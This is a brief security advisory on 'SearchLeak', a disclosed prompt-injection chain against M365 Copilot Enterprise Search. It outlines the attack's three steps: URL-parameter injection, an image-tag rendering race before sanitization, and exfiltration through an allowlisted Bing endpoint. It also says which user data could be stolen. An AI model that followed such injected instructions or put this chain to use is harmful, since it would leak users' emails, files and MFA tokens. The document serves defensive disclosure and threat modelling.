What happened
Varonis Threat Labs disclosed 'SearchLeak' on June 15, 2026 — CVE-2026-42824, rated Critical by Microsoft (CVSS 6.5). The attack chains three weaknesses in M365 Copilot Enterprise Search: (1) Parameter-to-Prompt injection via the 'q' URL parameter, (2) an HTML rendering race condition where injected image tags fire before output sanitization completes, and (3) a Bing SSRF that uses Bing's image-search endpoint — allowlisted in the CSP — as an exfiltration proxy. A single click on a legitimate microsoft.com link silently exfiltrates emails, calendar events, OneDrive/SharePoint files, and MFA tokens. Microsoft patched server-side in early June 2026; no customer action required. No in-the-wild exploitation observed.
Why it matters
SearchLeak is the third major Copilot exfiltration chain disclosed by security researchers (after EchoLeak CVE-2025-32711 and Reprompt), establishing a repeating pattern: prompt injection + web security primitives (SSRF, HTML injection timing) = high-impact compound attack surface in AI assistants. It demonstrates that AI-integrated enterprise search creates fundamentally new exfiltration surfaces that bypass traditional URL-filtering and CSP controls.
Applicability
M365 Copilot Enterprise Search customers: patched server-side, no action required. Security architects should review AI assistant rendering pipelines, CSP allowlists (especially *.bing.com and similar trusted domains), and treat AI streaming output as untrusted. Threat modelers should include P2P injection as a standard attack vector in any LLM-integrated enterprise product.